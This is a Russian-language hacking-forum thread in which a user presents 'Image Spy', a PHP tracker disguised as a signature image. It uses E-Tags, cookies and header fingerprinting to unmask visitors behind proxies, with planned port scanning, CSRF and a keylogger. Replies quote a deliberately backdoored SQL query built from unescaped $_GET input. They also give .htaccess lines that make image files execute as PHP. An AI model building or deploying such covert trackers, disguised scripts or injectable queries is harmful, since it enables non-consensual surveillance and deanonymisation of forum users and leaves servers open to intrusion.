Image Spy

Discussion in 'Инструменты' started by randman, 19 Aug 2012.

  1. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    609
    Reputations:
    1,101
    Image Spy v0.1 Alpha​


    Скрипт находиться в стадии ранней разработки, предназначен для ведения логов с картинок, подписей.

    Скачать: http://zalil.ru/33691238 (10 Дней, для тех кто хочет получить представление о способе с E-Tag)

    Пароль: TkXRwq62FddBJjdDpPNDyFzbg6rqAq1StOfYO6Snehog5apLTJvv92P6jItjZQ7UbeVhqlijba1PcdNOEDMYSUbZGclz0f6O1alJxI6FMBsuyjGOQqegQ65YHzU4O9Crt6qRRRcCOmWuGmLcFPvPvwljx0yhoUFuJbr51RWuMQPJlQlFjPRmVyYCoA5EFKBcsJXlWNpgRgWLAxhL92qbYa481HlgAEqM0TiXbpCQmUn10aC8UUVO1IZL7vmRO851

    Тему создаю только ради обсуждения различных возможных способов добычи информации, код в архиве очень сырой и использоваться по назначению пока не может.

    В настоящее время реализована функция выдачи уникального E-Tag, по которому можно определять разные IP в случае использовании Proxy. Будет реализовано:
    • Удобная админка
    • Выдача куков и уникальной даты модификации по усмотрению пользователя
    • Оптимизация хранения E-Tag, оптимизация скриптов
    Примерная будущая админка: http://s002.radikal.ru/i199/1208/22/807145992227.png Для ведения логов с античата требуется разместить скрипт на HTTPS хостинге.

    Следующая версия будет полноценна, выложена в начале-середине сентября. За это время хотел бы обсудить с вами способы различной добычи информации(Реализую всё, что будет в моих силах), конспирации скрипта под обычную картинку и предоставление логов в админке.

    В настоящее время у меня есть идеи в первую очередь к сканированию определённых портов клиента, фоновому поиску по базам прокси, добавление возможностей описанных M_Script(CSS в HTTP заголовках, http://forum.antichat.ru/showpost.php?p=2878341&postcount=9) , http://forum.antichat.ru/showpost.php?p=2878334&postcount=8
     
    #1 randman, 19 Aug 2012
    Last edited: 19 Aug 2012
    2 people like this.
  2. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    609
    Reputations:
    1,101
    Как вижу, ни у кого нет предложений. Проект идёт на паблик, в данный момент реализовано всё что указано в теме, кроме SMB сервера(Не протестирован на Windows), и админки - т. к. с ней нужно разбираться отдельно, и возможно никто её пользоваться и не будет.

    В дальнейшем будет и SMB сервер, и этот проект будет соединён с IMS(Код я не выкладывал), идеи которой будут сюда вложены, в принципе это можно так и назвать. Результаты теста на других форумах(Через подпись) весьма неплохие.


    На данный момент меня ограничивает то, что могут быть недовольства на счёт темы заголовков, хотя они содержаться в спецификации HTTP. Хотелось бы услышать мнение M_Script, после чего тему можно удалить.
     
  3. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,074
    Likes Received:
    1,533
    Reputations:
    1,126
    кстати, зачем тебе в подписи
    http://media/images/img328342.gif ? :)
     
  4. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    609
    Reputations:
    1,101
    Для теста на реальной странице. Опера не совсем конкретно обрабатывает запрос на 127.0.0.1 через 127.0.0.1 прокси, поэтому не 127.0.0.1 а media.

    UDP: M_Script, ок, +У меня остались идеи из IMS, которые можно сюда добавить
     
    #4 randman, 11 Sep 2012
    Last edited: 13 Sep 2012
  5. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,599
    Likes Received:
    1,308
    Reputations:
    1,557
    Предлагаю не торопиться и оставить тему здесь. Есть идеи и наработки не конкретно по этой теме, но достаточно близкие к ней.
     
  6. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    609
    Reputations:
    1,101
    v0.2

    Версия v0.2, включил всё, что работает полностью(см. Выше).

    SMB Сервер, Аминка, работа с Iframe для CSRF, мультикартиночность и т. п. в разработке. +Планирую доработать и включить возможности JQuery KeyLogger, которым до этого проэкта было негде особо пользоваться.

    В этой версии:
    • Работа с куками
    • Работа с E-Tag
    • Работа c датой последней модификации
    • Определение разрешения экрана при работе из оперы в отдельной вкладке(Link:), в этой версии в файле ресурсопотребный цикл, выходные данные = 600Кб css, но их можно уменьшить сократив длину пути к картинке и максимальное разрешение, которое сейчас составляет 4000. Так же несовсем понятно, лучше определять разрешение экрана или области браузера, - для Link без вложенных циклов >64Мб возможно определить только две переменные.
    • Запись хэша отдельных заголовков браузера(Вариантов скорее всего менее 500, т.к. из PHP невозможно получить чистые заголовки)
    • Запись Proxy-Заголовков
    • Возможность создания быстрого парсинга с Referer-страници
    Не всё работает стабльно, но в следующей версией это обеспечу, т. к. проект придётся значительно расширять. Сейчас у меня гораздо больше идей, чем было изначально - в основном для более удобной автоматизации и работы с несколькими порталами.

    -Версия до конца не протестирована на наличие ошибок/уязвимостей

    С следующей версией можно будет нормально работать(В плане удобства и полноценной защиты от пользователей), будет добавлено разделение на различные форумы/функции т.е. однозначности проекта не будет.
     

    Attached Files:

    #6 randman, 15 Sep 2012
    Last edited: 15 Sep 2012
  7. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    609
    Reputations:
    1,101
    Сейчас версия не разрабатывается из-за наличия другого собственного ПО для получения этой информации, но может кому-то пригодится.

    Все спущенные тема не получили абсолютно никакой заинтересованности, если есть что предложить - пишите в ПМ.
     
    #7 randman, 18 May 2013
    Last edited: 18 May 2013
  8. SOSPASTOR

    SOSPASTOR New Member

    Joined:
    28 May 2013
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Как зайти в админку и где она???
     
    1 person likes this.
  9. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    609
    Reputations:
    1,101
    Найти её очень просто, её нет :D Это не полная разработка, информацию можно смотреть напрямую в MySQL.

    На следующей неделе начинается разработка более-усовершенствованного ПО для этих-же целей, скорее всего ближайшее время в этот раздел оно выкладываться не будет, но если у вас есть предложения/пожелания мы можем их учесть.
     
  10. Грабитель

    Joined:
    5 Mar 2013
    Messages:
    198
    Likes Received:
    12
    Reputations:
    -7
    Code:
    $MyID = $MySQLi->MySQLi->query("SELECT `UserData` FROM `imglog` WHERE ip = '{$_SERVER['REMOTE_ADDR']}' and id = {$_GET['id']}")/*Backdoor*/
    Забавно :)

    Протестировать так и не получилось, на двух серверах выдаётся ошибка 500, но задумка гениальная, с сохранением сессий, назначением кукисов для дальнейшего выцепления айпи адресов, они же могут меняться, и если человек на том же античате хоть раз зайдет с реального айпи, то.. "влип очкарик"
    Поковырял немножко код, так и не смог найти алгоритма определения разрешения экрана в опере...
    насколько я понял, 90% кода базируется на парсинге массива _SERVER вытаскивая из него нужную информацию, впринципе в любом современном сниффере сохранение всего массива _SERVER уже классический способ, а там информация как на ладони.

    Ещё небольшое замечание из личного опыта, в корне .htaccess назначение файлов исполняемыми:
    Code:
    AddType application/x-httpd-php .php .jpg .gif .png .css
    Так на определённых серверах работать не будет, с чем это связано не знаю, видимо особые конфигурации апача, поэтому перед данной строкой рекомендуется вставлять:
    Code:
    RemoveHandler .gif
    AddType application/x-httpd-php .gif
    
    Это универсальный способ работающий везде, по крайней мере у меня сбоев ещё не давал.

    А так, буду следить за релизом, это очень интересная разработка.
     
    1 person likes this.